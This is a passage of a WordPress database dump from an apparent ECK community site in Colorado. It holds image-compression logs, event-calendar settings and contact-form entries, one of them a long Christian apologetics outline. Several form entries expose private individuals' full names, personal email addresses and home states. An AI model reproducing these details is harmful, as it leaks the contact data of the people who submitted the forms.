WP-Optimize'),(90874,260648,'smush-complete','1'),(90875,260648,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:14905;s:12:\"smushed-size\";i:14148;s:15:\"savings-percent\";d:5.08;}'),(90876,260649,'original-file','2020/03/daisy-updraft-pre-smush-original.jpg'),(90877,260649,'smush-info','The file was compressed from 12.53 KB to 11.97 KB saving 4.48 percent using WP-Optimize'),(90878,260649,'smush-complete','1'),(90879,260649,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:12829;s:12:\"smushed-size\";i:12254;s:15:\"savings-percent\";d:4.48;}'),(90880,260650,'original-file','2020/03/girl-kite-updraft-pre-smush-original.jpg'),(90881,260650,'smush-info','The file was compressed from 18.25 KB to 17.88 KB saving 2.04 percent using WP-Optimize'),(90882,260650,'smush-complete','1'),(90883,260650,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:18686;s:12:\"smushed-size\";i:18305;s:15:\"savings-percent\";d:2.04;}'),(90884,260651,'original-file','2020/03/heart-cloud-updraft-pre-smush-original.jpg'),(90885,260651,'smush-info','The file was compressed from 25.00 KB to 23.85 KB saving 4.59 percent using WP-Optimize'),(90886,260651,'smush-complete','1'),(90887,260651,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:25597;s:12:\"smushed-size\";i:24421;s:15:\"savings-percent\";d:4.59;}'),(90888,260652,'original-file','2020/03/hot-air-balloon-abstract-updraft-pre-smush-original.jpg'),(90889,260652,'smush-info','The file was compressed from 17.96 KB to 17.31 KB saving 3.6 percent using WP-Optimize'),(90890,260652,'smush-complete','1'),(90891,260652,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:18390;s:12:\"smushed-size\";i:17728;s:15:\"savings-percent\";d:3.6;}'),(90892,260653,'smush-info','The file was compressed from 18.05 KB to 18.05 KB saving 0 percent using WP-Optimize'),(90893,260653,'smush-complete','1'),(90894,260653,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:18488;s:12:\"smushed-size\";i:18488;s:15:\"savings-percent\";d:0;}'),(90895,260654,'original-file','2020/03/mtn-path-1-updraft-pre-smush-original.jpg'),(90896,260654,'smush-info','The file was compressed from 32.26 KB to 30.26 KB saving 6.19 percent using WP-Optimize'),(90897,260654,'smush-complete','1'),(90898,260654,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:33036;s:12:\"smushed-size\";i:30990;s:15:\"savings-percent\";d:6.19;}'),(90899,260655,'original-file','2020/03/pink-tree-updraft-pre-smush-original.jpg'),(90900,260655,'smush-info','The file was compressed from 30.47 KB to 28.52 KB saving 6.39 percent using WP-Optimize'),(90901,260655,'smush-complete','1'),(90902,260655,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:31203;s:12:\"smushed-size\";i:29208;s:15:\"savings-percent\";d:6.39;}'),(90903,260645,'original-file','2020/03/blue-flower-updraft-pre-smush-original.jpg'),(90904,260645,'smush-info','The file was compressed from 30.97 KB to 29.20 KB saving 5.72 percent using WP-Optimize'),(90905,260645,'smush-complete','1'),(90906,260645,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:31715;s:12:\"smushed-size\";i:29900;s:15:\"savings-percent\";d:5.72;}'),(90907,260647,'smush-info','The file was compressed from 19.59 KB to 19.59 KB saving 0 percent using WP-Optimize'),(90908,260647,'smush-complete','1'),(90909,260647,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:20063;s:12:\"smushed-size\";i:20063;s:15:\"savings-percent\";d:0;}'),(90910,260646,'original-file','2020/03/blue-fog-branch-updraft-pre-smush-original.jpg'),(90911,260646,'smush-info','The file was compressed from 22.02 KB to 21.25 KB saving 3.5 percent using WP-Optimize'),(90912,260646,'smush-complete','1'),(90913,260646,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:22553;s:12:\"smushed-size\";i:21763;s:15:\"savings-percent\";d:3.5;}'),(90914,260644,'smush-info','The file was compressed from 21.90 KB to 21.90 KB saving 0 percent using WP-Optimize'),(90915,260644,'smush-complete','1'),(90916,260644,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:22430;s:12:\"smushed-size\";i:22430;s:15:\"savings-percent\";d:0;}'),(90917,260658,'smush-info','The file was compressed from 20.52 KB to 20.52 KB saving 0 percent using WP-Optimize'),(90918,260658,'smush-complete','1'),(90919,260658,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:21010;s:12:\"smushed-size\";i:21010;s:15:\"savings-percent\";d:0;}'),(90920,260659,'smush-info','The file was compressed from 54.13 KB to 54.13 KB saving 0 percent using WP-Optimize'),(90921,260659,'smush-complete','1'),(90922,260659,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:55434;s:12:\"smushed-size\";i:55434;s:15:\"savings-percent\";d:0;}'),(90923,260660,'smush-info','The file was compressed from 33.99 KB to 33.99 KB saving 0 percent using WP-Optimize'),(90924,260660,'smush-complete','1'),(90925,260660,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:34805;s:12:\"smushed-size\";i:34805;s:15:\"savings-percent\";d:0;}'),(90926,260661,'original-file','2020/03/tree-blue-field-updraft-pre-smush-original.jpg'),(90927,260661,'smush-info','The file was compressed from 31.86 KB to 29.69 KB saving 6.82 percent using WP-Optimize'),(90928,260661,'smush-complete','1'),(90929,260661,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:32629;s:12:\"smushed-size\";i:30405;s:15:\"savings-percent\";d:6.82;}'),(90930,260662,'original-file','2020/03/wood-bridge-nature-updraft-pre-smush-original.jpg'),(90931,260662,'smush-complete','1'),(90932,260662,'smush-info','The file was compressed from 33.68 KB to 31.27 KB saving 7.14 percent using WP-Optimize'),(90933,260662,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:34486;s:12:\"smushed-size\";i:32023;s:15:\"savings-percent\";d:7.14;}'),(90998,132374,'protect_children',''),(91031,132184,'_edit_lock','1620074645:2'),(91049,132184,'protect_children',''),(91050,132184,'_pum_user_modified','1'),(91051,132184,'popup_theme_overlay','a:0:{}'),(91052,132184,'popup_theme_container','a:0:{}'),(91053,132184,'popup_theme_title','a:0:{}'),(91054,132184,'popup_theme_content','a:0:{}'),(91055,132184,'popup_theme_close','a:0:{}'),(91772,261495,'protect_children',''),(91773,261497,'_wp_attached_file','2020/03/eck-logo-paypal.png'),(91774,261497,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:223;s:6:\"height\";i:222;s:4:\"file\";s:27:\"2020/03/eck-logo-paypal.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"eck-logo-paypal-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:25:\"eck-logo-paypal-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:27:\"eck-logo-paypal-181x180.png\";s:5:\"width\";i:181;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:27:\"eck-logo-paypal-210x150.png\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(117381,262893,'_RTEClimitRegistrations','0'),(117380,262893,'_RTECwhoCanRegister','any'),(117379,262893,'_RTECdeadlineType','start'),(117336,262891,'_EventCurrencySymbol',''),(117337,262891,'_EventCurrencyPosition','prefix'),(117338,262891,'_EventCost',''),(117339,262891,'_EventURL',''),(117340,262891,'_EventTimezone','America/Denver'),(117341,262891,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610280900;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1613304900;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1615724100;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1618143300;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1620562500;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1623586500;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1626005700;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1628424900;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1631448900;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1633868100;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(117333,262891,'_EventShowMapLink','1'),(117334,262891,'_EventShowMap','1'),(117335,262891,'_EventVenueID','262507'),(151804,266081,'mec_cost',''),(117324,262891,'_EventOrigin','events-calendar'),(117327,262891,'_RTECdeadlineType','start'),(117328,262891,'_RTECwhoCanRegister','any'),(117317,262891,'_EventStartDateUTC','2021-09-12 18:15:00'),(117318,262891,'_EventEndDate','2021-09-12 13:45:00'),(117331,262891,'boldgrid_hide_page_title','0'),(117319,262891,'_EventEndDateUTC','2021-09-12 19:45:00'),(117320,262891,'_EventDuration','5400'),(117321,262891,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512444;s:12:\"_EventOrigin\";i:1607512444;s:16:\"protect_children\";i:1607512444;s:13:\"_thumbnail_id\";i:1607512444;s:26:\"_RTECregistrationsDisabled\";i:1607512444;s:17:\"_RTECdeadlineType\";i:1607512444;s:19:\"_RTECwhoCanRegister\";i:1607512444;s:23:\"_RTEClimitRegistrations\";i:1607512444;s:21:\"_RTECmaxRegistrations\";i:1607512444;s:16:\"_EventRecurrence\";i:1607512444;s:17:\"_EventShowMapLink\";i:1607512444;s:13:\"_EventShowMap\";i:1607512444;s:13:\"_EventVenueID\";i:1607512444;s:20:\"_EventCurrencySymbol\";i:1607512444;s:22:\"_EventCurrencyPosition\";i:1607512444;s:10:\"_EventCost\";i:1607512444;s:9:\"_EventURL\";i:1607512444;s:14:\"_EventTimezone\";i:1607512444;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512444;s:16:\"tribe_events_cat\";i:1607537644;}'),(117323,262891,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512444;s:12:\"_EventOrigin\";i:1607512444;s:16:\"protect_children\";i:1607512444;s:13:\"_thumbnail_id\";i:1607512444;s:26:\"_RTECregistrationsDisabled\";i:1607512444;s:17:\"_RTECdeadlineType\";i:1607512444;s:19:\"_RTECwhoCanRegister\";i:1607512444;s:23:\"_RTEClimitRegistrations\";i:1607512444;s:21:\"_RTECmaxRegistrations\";i:1607512444;s:16:\"_EventRecurrence\";i:1607512444;s:17:\"_EventShowMapLink\";i:1607512444;s:13:\"_EventShowMap\";i:1607512444;s:13:\"_EventVenueID\";i:1607512444;s:20:\"_EventCurrencySymbol\";i:1607512444;s:22:\"_EventCurrencyPosition\";i:1607512444;s:10:\"_EventCost\";i:1607512444;s:9:\"_EventURL\";i:1607512444;s:14:\"_EventTimezone\";i:1607512444;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512444;s:16:\"tribe_events_cat\";i:1607537644;}'),(117326,262891,'_RTECregistrationsDisabled','1'),(92744,261620,'_field_133','Glen'),(91893,213454,'protect_children',''),(91896,261517,'protect_children',''),(91897,261517,'_edit_lock','1651352427:2'),(91898,261517,'_edit_last','2'),(92749,261620,'_form_id','13'),(92750,261620,'_seq_num','47'),(93050,261635,'_field_224','Laurah'),(92967,261630,'_field_179','Laura'),(92968,261630,'_field_180','Grady'),(92969,261630,'_field_181','laurajgrady@gmail.com'),(92970,261630,'_field_182','FL'),(92971,261630,'_field_183','US'),(92972,261630,'_field_184','a:1:{i:0;s:41:\"Central Colorado - ECK Temple in Colorado\";}'),(92973,261630,'_form_id','17'),(92974,261630,'_seq_num','1'),(93006,261632,'_field_224','mike'),(93007,261632,'_field_225','potvin'),(93008,261632,'_field_226','mike9p@gmail.com'),(93009,261632,'_field_227','CO'),(93010,261632,'_field_228','US'),(93011,261632,'_field_229','a:2:{i:0;s:16:\"Colorado Springs\";i:1;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(93012,261632,'_form_id','21'),(93013,261632,'_seq_num','97'),(93014,261633,'_field_224','Ingrid'),(93015,261633,'_field_225','Kolstoe '),(93016,261633,'_field_226','osingieik@gmail.com'),(93017,261633,'_field_227','CO'),(93018,261633,'_field_228','US'),(93019,261633,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(93020,261633,'_form_id','21'),(93021,261633,'_seq_num','98'),(93051,261635,'_field_225','Brock Young'),(93052,261635,'_field_226','laurahbrockyoung@gmail.com'),(93053,261635,'_field_227','AZ'),(93054,261635,'_field_228','US'),(93055,261635,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(93056,261635,'_form_id','21'),(93057,261635,'_seq_num','99'),(93137,261644,'_field_224','Brigitte'),(93138,261644,'_field_225','Kickbusch'),(93139,261644,'_field_226','light@hubriki.de'),(93140,261644,'_field_227','CO'),(93141,261644,'_field_228','DE'),(93142,261644,'_field_229','a:2:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";i:1;s:8:\"Loveland\";}'),(192816,269146,'mec_start_date','2023-10-06'),(192815,269146,'mec_public','1'),(192814,269146,'mec_countdown_method','global'),(192813,269146,'mec_timezone','global'),(192812,269146,'mec_comment',''),(93808,261730,'_field_138','Positive Defense of the Christian Perspective\n\nA. The Trustworthiness of the New Testament\n\n1	The New Testament has better manuscript evidence than any other ancient book.\n\na.	There are over 5,000 New Testament manuscripts and portions of manuscripts.  By comparison, the majority of classical works have less than 20 manuscripts.\n\nb.	The dates of the New Testament manuscripts are close to the original writings.  One Gospel fragment (Ryland’s) dates about 25 years after the Gospel of John and most of the New Testament (Chester Beatty and Bodmer Papyri) from 50-150 years after the originals.  Most classical works date from 700 – 1400 years after the originals.\n\nc.	None of the canonical New Testament is lost or missing.  By comparison, 107 of Livy’s 142 books of history have been lost and about one half of Tacitus’ 30 books of Annals and Histories is missing.\n2.  Good arguments can be given that each of the Gospels was either written by an 	eyewitness, or significantly influenced by firsthand testimony, as recognized by 	many contemporary scholars.\n3.	Even without proving eyewitness authorship, the Gospels measure up well by 	normal historical standards used in ancient historiography.\n4.	The Gospel are trustworthy sources, as explained by A.M. Hunter\n	a.  These Christian authors, like their Jewish counterparts, were careful to   	preserve traditional material.\n	b.  The Gospels are close to eyewitness sources.\n	c.  The Gospel authors were honest reporters.\n	d.	The picture of Jesus presented in the four Gospels is virtually the same 	(see Archibald M. Hunter, Bible and Gospel, pp. 32-37).\n5.  The Gospels and Acts exhibit a specific interest in reporting historical facts, not mythology.  This is especially the case when the life of Jesus is reported.\n6.	Contemporary historians frequently opposed the application of radical criticism to New Testament studies.  According to A.N. Sherwin-White and Michael Grant, such attacks fail at a number of crucial points  (see A.N. Sherman-White, Roman Society, pp. 186-193; Grant,  Jesus: An Historian Review, pp. 179-184, 199-201).\n	a.  Numerous ancient works exhibit intentions and methodologies similar to 	that of the New Testament authors, and yet these ancient works are well	accredited as historical works.\n	b.  There are no ancient writings in the category that radical critics place the 	Gospels.\n	c.  New Testament books such as Acts have been largely confirmed by 	external test of historicity.\n7.	The Gospel and Acts were recognized as inspired books almost immediately after being written (see J.B. Lightfoot, The Apostolic Fathers).\n	a.	1 Timothy 5:18 quotes Luke 10:7 and refers to it as “Scripture.”\n	b.	Clement of Rome (about AD 95) speaks of the “Gospel” and quotes 	portions found in all three synoptic Gospels, referring to them as the 	words of Jesus (Corinthians 13,46).\n	c.	Ignatius (Smyrnaeans 3) and Polycarp (Philippians 2, 7), both writing 	about AD 115, refer to verses in the synoptic Gospels as the words of 	Christ.	\n8.	Paul’s epistles were also recognized as inspired Scripture almost immediately after being written.\n		a.	2 Peter 3:15-16 calls Paul’s epistles “Scripture.”\n		b.	Clement of Roman (Corinthians 47), Ignatius (Ephesians 10; to Polycarp 	5), and Polycarp (Philippians 1,3-4, 6)  all refer to Paul’s writings as 	inspired.\n\nB.  The Historicity of Jesus\n\n1.  The trustworthy Gospels (A above) exhibit much interest in the historical Jesus and give accurate accounts of his life, death, and resurrection.\n2.	Numerous pre- and extra biblical sources record much ancient testimony concerning Jesus within 125 years after his death.\n	a.	Early Christian creeds that pre-date the New Testament, as well as the 	historical facts that virtually all critical scholars admit, provide an 	extremely strong case for the death and resurrection of Jesus.\n	b. 	Archaeology contributes a few finds that illuminate and provide 	background for Jesus’ career, such as the crucifixion victims investigated 	by archaeologist Vasilius Tzaferis, “Jewish Tombs At and Near Giv’at ha-	Mivtar,” Israel Exploration Journal 20 (1970), pp. 38-59.\n\n		Also the Shroud of Turin (Historically proclaimed to be the actual burial 	garment of Jesus). See Ian Wilson, The Shroud of Turin (New York: 	Doubleday, 1978, also see John Heller, Report on the Shroud of Turin 	(Boston: Houghton Mifflin, 1983), especially chapters 12-14.\n\nd.		Secular historians (e.g. Cornelius Tacitus, Gaius Suetonius Tranquillas), 	government officials (e.g. Piny the Younger, Emperor Trajan), religious 	works (e.g. The Talmud, Toledoth Jesu, and other sources report many 	details about Jesus from non-Christian viewpoints.\ne.		Ancient Christian sources preserve a number of historical statements about Jesus (e.g. Clement of Rome, Ignatius, Justin Martyr).\n4.  	To reject Jesus’ miracles a priori is to ignore correct inductive procedure where 	all the facts are investigated before a decision is made.\n5.	To reject Jesus’ doctrinal teachings a priori as valid for today is to pick and choose 	portions of the Gospels.  Further, If Jesus was raised from the dead, there is, at a 	minimum, some implied significance for Jesus’ teachings, as well.\n6.	Without a significant historical basis in the life of Jesus, Christianity would have 	had no impetus for its origins.\n7.	Jesus died on the cross, as indicated by several facts.\n	a.  The nature of crucifixion, including the discovery of Yohanan’s skeleton, 	reveals both the nature and assurance of death by this method.\n	b.	The explanation of Jesus’ heart wound indicates that it would have killed 	him even if he had been alive.\n	c.	The death of Jesus is the most recorded event in ancient, non-Christian 	history.\n	d.	The trustworthy Gospels give accurate accounts of Jesus’ death.\n8.	After his death, Jesus was raised bodily and appeared to his followers.\n		a.	Naturalistic hypothesis that have sought to explain in normal terms the 	supernatural element of Jesus’ resurrection have failed to do so, chiefly 	because they are refuted by the known historical data.  Several other 	reasons also indicate this failure.\n		b.	There are numerous positive evidences for the resurrection that indicate 	that Jesus rose from the dead and appeared to many of those who 	followed him.\n		c.	A case for the resurrection can be built by using only those minimal facts 	that are clearly established by the historical method.  On a smaller scale, 	these facts can refute the alternative hypotheses and provide the best 	evidences for the resurrection.	\n		d.	The Shroud of Turin may supply some additional scientific evidence of 	Jesus’ resurrection.\n9.	Jesus’ message was not changed by Paul or by other followers.\n		a.	In both the synoptics, as well as in John, Jesus claimed to be deity.  Often 	this was done by his words, such as his claims to be Son of God and Son of 	Man (c.f. Mark 2:10-11; 10:45; 13:32; 14:36).  At other times he showed 	his deity by his actions, such as forgiven sin, fulfilling Old Testament 	messianic prophecy and  by claiming authority much greater than that of 	the Jewish leaders (see Mark 2:1-12; Matthew 5;20-48; cf. Isaiah 9:6-7).\n		b.	Numerous pre-Pauline creeds such as Philippians 2:6-11, Romans 1:3-4, 1 	Corinthians 11:23, and many from the book of Acts designate Jesus by the 	loftiest titles, thereby indicating the early teaching of his deity.  These 	show further that this doctrine definitely did not originate with Paul.\n		c.	Neither Jesus nor Paul taught that Christianity was a new religion.  Both 	held that Christianity was a fulfillment of Judaism (see Matt. 5:18; Luke 	16:16-17; Romans 10:4:9-11; Colossians 2:16-17).\n		d.	Jesus’ central teaching of the Kingdom of God and its entrance 	requirements of faith in his person and teachings in found in all four 	Gospels (c.f. Mark 1:14-15; Matthew 18:3-6; Luke 18:28-30; John 1:10-13) 	and in Paul’s epistles (c.f. Romans 6:23; 1 Corinthians 15:1-4).\n		f.	Paul was known as the apostle to the Gentiles (see Acts 9:15;16; 22:21; 	Romans 11:13-14).  Not only did Jesus command his disciples to take the 	gospel to the Gentiles (see Matthew 28:19-20; Luke 24:47; John 10:16; 	Acts 1:8), but this was actually a fulfillment of Old Testament prophecy, 	not a new doctrine (see Genesis 12:3; Isaiah 19:18-25 for two examples).\n		g.	Since Jesus literally rose from the dead, any verification of the 	truthfulness of his teachings would even extend to Paul’s message and 	writings, since they are in agreement with the Gospels at these points.\n10.	Jesus was not an international traveler during his “silent years” or after his death.\n		a.	There is no viable historical evidence for such international ventures.\n		b.	The swoon theory fails and is rejected by critical scholars.\n		c.	These endeavors almost always involved a long trail of illogic and 	incredibly mysterious connections.\n\nC.  Miracle-claims\n\n1.	Although many would place miracle-claims completely in the realm of faith, such is to ignore their possibly objective theistic and historical nature.\n		a.	If it is taught that miraculous events have occurred in history, as in the 			case with New Testament miracle-claims, then at least the objective, 			historical side of such a claim can be investigated.  In other words, if it 			actually happened, at least the portion of the event that touched the 			space-time world can potentially be examined.\n		b.	In the New Testament, the resurrection of Jesus is not only the central 	 		tenet Christianity, but it is asserted that if Jesus did not rise from the 			dead, then faith in actually in vain (1 Corinthians 15:1-20).  Paul even 			supports his point that Jesus was raised by citing eyewitnesses, 				historical testimony to this fact (vv. 5-8).  Under these circumstances, 			one could hardly claim that objective, factual interests in the 				resurrection are foreign to the New Testament.\n		c.	This objection also commits errors that are associated with the “leap of 			faith.”  If carried to its logical conclusion, it provides no objective basis for 		faith, including any reasons why faith should be exercised at all. As such, it 		is difficult to distinguish between belief and credulity.\n2.	Alternative theories that have been proposed to account for Jesus’ resurrection on naturalistic grounds have failed to account for the known historical facts.\n3.	There are many strong historical reasons to believe that Jesus was raised from the dead.\n		a.	The disciples’ experiences\n		b.	The transformation of the disciples into bold witnesses\n		c.	The empty tomb\n		d.	The resurrection of Jesus was the very center of the apostolic message.\n		e.	The Jewish leaders could not disprove their message.\n		f.	The very existence and growth of the church.\n		g.	In this resurrected physical body Jesus appeared to more than five 			hundred of his disciples on twelve different occasions over a forty-day 			period and conversed with them (see Luke 24:13-49, 1 Corinthians 15:5-7, 		Acts 1:4-8, Matthew 28:1-10, John 20:24-31).\nThis was the greatest of all miracles since the creation itself, and could have been accomplished only if Jesus indeed is God, as He had claimed to be.\n\nD.  Predictive Prophecies\n\nConsider the following predictions made centuries in advanced that Jesus would be:\n1.	born of a woman (Genesis 3:15; cf. Galatians 4:4);\n2.	born of a virgin (Isaiah 7:14; cf. Matthew 1:21);\n\n3.	“cut off” (die) 483 years after the declaration to reconstruct the city of Jerusalem in 444 B.C.  (Daniel 9:24);\n\n4.	of the seed of Abraham (Genesis 12:1-3 and 22:18; cf. Mathew 1:1);\n\n5.	of the tribe of Judah (Genesis 49:10, cf. Luke 3:23);\n\n6.	of the house of David (2 Samuel 7:12; cf. Matthew 1:1);\n\n7.	born in Bethlehem (Micah 5:2; cf. Matthew 2:1);\n\n8.	anointed by the Holy Spirit (Isaiah 11:2; cf. Mattthew 3:16-17);\n\n9.	that Jesus would performed miracles (Isaiah 35:5-6; cf. Matthew 9:35);\n\n10.	would cleanse the temple (Malachi 3:1; cf. Matthew 21:12);\n\n11.	would be rejected by Jews (Psalms 118:22; cf. 1 Peter 2:7);\n\n12.	die a humiliating death (Psalms 22; cf. Matthew 9:35);\n\n13.	that he would rise from the dead (Psalm 2:7 and 16:10; cf. Acts 2:31)\n\n14.	ascended into heaven (Psalm 68:8; cf. Acts 1:9);\n\n15.	and sit at the right hand of God (Psalm 110:1; cf. Hebrew 1:3).\n\nIt is important to understand that these prophecies were written hundreds of years before Christ was born.  No one could have been reading the trends of the times or just making intelligent guesses, like the “prophecies” we see in the checkout line at the supermarket.\n\n\n\n\n\n\n\n\n\n\n\n\n\n  \n'),(93807,261730,'_field_137','Positive Defense of the Christian Perspective'),(93806,261730,'_field_135','p.cramer@aol.com'),(93805,261730,'_field_134','Cramer'),(143504,265134,'_thumbnail_id','265140'),(93804,261730,'_field_133','Paula'),(93627,261714,'popup_theme_data_version','3'),(93628,261714,'_pum_built_in','floating-bar'),(93629,261714,'protect_children',''),(93633,261715,'_field_137','Newsletter Subscription'),(93634,261715,'_field_138','Hello fellow ECKists in Colorado,\nI have subscribed to your newsletter and successfully receive it (and could already participate in your Zoom events :-))\nThank you.\n\nA dear friend of mine (Brigitte Kickbusch, she is an H.I. too) tried to subscribe too - but as she told me, it didn`t work out, although she received a confirmation when she subscribed.\nHer Mail address ist                    brigitte.kickbusch@stb-kickbusch.de\n\nIs there anything she still would have to do to receive the newsletter or could you do anything to let her regularily receive it?\n\nThank you very much for your help\n\nand also thank you very much for making the online SOUND OF SOUL EVENTS possible,\n\nMuch LOVE in ECK\nsends Benny B.\nfrom Germany'),(93635,261715,'_form_id','13'),(93636,261715,'_seq_num','50'),(93713,261720,'_field_224','Diane'),(93714,261720,'_field_225','Haddenham'),(93715,261720,'_field_226','264haddenh@gmail.com'),(93716,261720,'_field_227','WA'),(93717,261720,'_field_228','US'),(93718,261720,'_field_229','a:3:{i:0;s:16:\"Colorado Springs\";i:1;s:39:\"Central Colorado/ECK Temple in Colorado\";i:2;s:8:\"Loveland\";}'),(93719,261720,'_form_id','21'),(93720,261720,'_seq_num','102'),(116348,262812,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262803;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4500;}i:262804;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4500;}i:262805;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4500;}i:262806;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4500;}i:262807;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4500;}i:262808;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4500;}i:262809;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4500;}i:262810;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4500;}i:262811;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4500;}i:262812;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(116345,262812,'_EventCost',''),(116346,262812,'_EventURL',''),(116347,262812,'_EventTimezone','America/Denver'),(116342,262812,'_EventVenueID','262507'),(116343,262812,'_EventCurrencySymbol',''),(116344,262812,'_EventCurrencyPosition','prefix'),(116340,262812,'_EventShowMapLink','1'),(116341,262812,'_EventShowMap','1'),(104867,262519,'_EventEndDate','2021-02-21 13:00:00'),(104868,262519,'_EventEndDateUTC','2021-02-21 20:00:00'),(115102,262814,'_RTECwhoCanRegister','any'),(104869,262519,'_EventDuration','5400'),(117369,262892,'_EventURL',''),(116268,262809,'_EventOrigin','events-calendar'),(116270,262809,'_RTECregistrationsDisabled','1'),(116271,262809,'_RTECdeadlineType','start'),(115742,262795,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:10:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(114576,262795,'_EventDuration','4200'),(104865,262519,'_EventStartDate','2021-02-21 11:30:00'),(104866,262519,'_EventStartDateUTC','2021-02-21 18:30:00'),(121080,263203,'_EventURL',''),(121034,263196,'smush-info','The file was compressed from 65.43 KB to 55.28 KB saving 15.52 percent using 